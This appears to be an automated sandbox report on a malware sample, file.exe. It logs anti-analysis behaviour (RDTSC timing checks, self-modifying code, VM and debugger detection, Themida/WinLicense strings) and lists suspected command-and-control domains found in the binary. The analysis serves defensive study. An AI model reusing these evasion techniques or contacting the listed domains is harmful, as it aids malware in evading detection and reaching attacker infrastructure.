    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819B75 second address: 819B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819B7D second address: 819B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819CDF second address: 819CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819CE3 second address: 819CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC83451D8ACh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819CF5 second address: 819D12 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC834EB3D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC834EB3D4Bh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819D12 second address: 819D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A1EB second address: 81A219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC834EB3D4Fh 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC834EB3D4Eh 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A219 second address: 81A21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A365 second address: 81A36F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC834EB3D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778684 second address: 778688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778688 second address: 7786A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D53h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828BAC second address: 828BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826F21 second address: 826F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007FC834EB3D46h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826F34 second address: 826F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826F3A second address: 826F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8274BE second address: 8274C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827630 second address: 827648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D53h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827648 second address: 82766E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007FC83451D8B4h 0x00000010 jmp 00007FC83451D8AEh 0x00000015 jl 00007FC83451D8ACh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82766E second address: 827680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC834EB3D48h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827680 second address: 827684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8277BB second address: 8277C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8277C1 second address: 8277C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8277C6 second address: 8277CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8277CC second address: 8277D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82691E second address: 826923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826923 second address: 826974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B7h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC83451D8B6h 0x00000018 jmp 00007FC83451D8B6h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826974 second address: 826978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826978 second address: 82697E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82697E second address: 826990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC834EB3D4Ch 0x0000000c jnp 00007FC834EB3D46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826990 second address: 826998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EDC3 second address: 82EE26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FC834EB3D76h 0x0000000c jmp 00007FC834EB3D52h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC834EB3D52h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83B99F second address: 83B9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83B4A5 second address: 83B4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83B4AD second address: 83B4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83B4B1 second address: 83B4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83B4B7 second address: 83B4CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83451D8AFh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83B4CC second address: 83B4E0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC834EB3D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jns 00007FC834EB3D46h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F4EB second address: 83F4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F4EF second address: 83F4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F4F5 second address: 83F513 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC83451D8AEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jc 00007FC83451D8A6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 je 00007FC83451D8D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F513 second address: 83F517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844F0B second address: 844F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844F15 second address: 844F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D51h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jng 00007FC834EB3D46h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8496C7 second address: 8496CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858B9A second address: 858BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D54h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858BB4 second address: 858BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858E3F second address: 858E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859414 second address: 859418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85954C second address: 859550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A02E second address: 85A032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CF6B second address: 85CF9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC834EB3D53h 0x0000000d jmp 00007FC834EB3D57h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CF9D second address: 85CFA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CFA1 second address: 85CFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CB2B second address: 85CB37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CB37 second address: 85CB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC834EB3D46h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86037A second address: 8603AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8B8h 0x00000009 jmp 00007FC83451D8AFh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8603AD second address: 8603B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8603B2 second address: 8603C6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC83451D8AEh 0x00000008 jc 00007FC83451D8A6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8603C6 second address: 8603CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8603CA second address: 8603CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BA36 second address: 86BA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BA3C second address: 86BA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BA45 second address: 86BA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC834EB3D57h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D577 second address: 87D57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D57B second address: 87D598 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC834EB3D5Fh 0x00000008 jmp 00007FC834EB3D53h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D598 second address: 87D5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC83451D8AEh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88045C second address: 880461 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880146 second address: 880173 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC83451D8AFh 0x0000000c jng 00007FC83451D8A6h 0x00000012 jmp 00007FC83451D8B0h 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897E7F second address: 897E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC834EB3D46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8982CA second address: 898318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC83451D8BDh 0x0000000c jmp 00007FC83451D8B7h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC83451D8B5h 0x0000001a jmp 00007FC83451D8B2h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8984D9 second address: 8984E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898ABB second address: 898ADE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC83451D8B6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898ADE second address: 898B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC834EB3D46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FC834EB3D54h 0x00000017 jnc 00007FC834EB3D46h 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A657 second address: 89A671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83451D8B4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D1BF second address: 89D1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC834EB3D4Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D1CC second address: 89D1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC83451D8B5h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D1EA second address: 89D1F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FE97 second address: 89FE9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0157 second address: 8A0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007FC834EB3D4Ch 0x00000016 pop eax 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0175 second address: 8A017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1AF8 second address: 8A1B12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC834EB3D71h 0x0000000e jbe 00007FC834EB3D48h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B12 second address: 8A1B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1606 second address: 8A160C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A160C second address: 8A1611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A34E9 second address: 8A3500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC834EB3D4Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B230C second address: 7B231D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FC83451D8A6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 613BFE instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 613B50 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7CC97F instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 83553D instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 1680Thread sleep time: -30000s >= -30000sJump to behavior
    Source: file.exe, file.exe, 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000000.00000002.2094677746.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075963595.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094677746.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076057849.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076057849.0000000000F62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000000.00000002.2094545265.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@h
    Source: file.exe, 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F5BB0 LdrInitializeThunk,0_2_005F5BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: *Program Manager
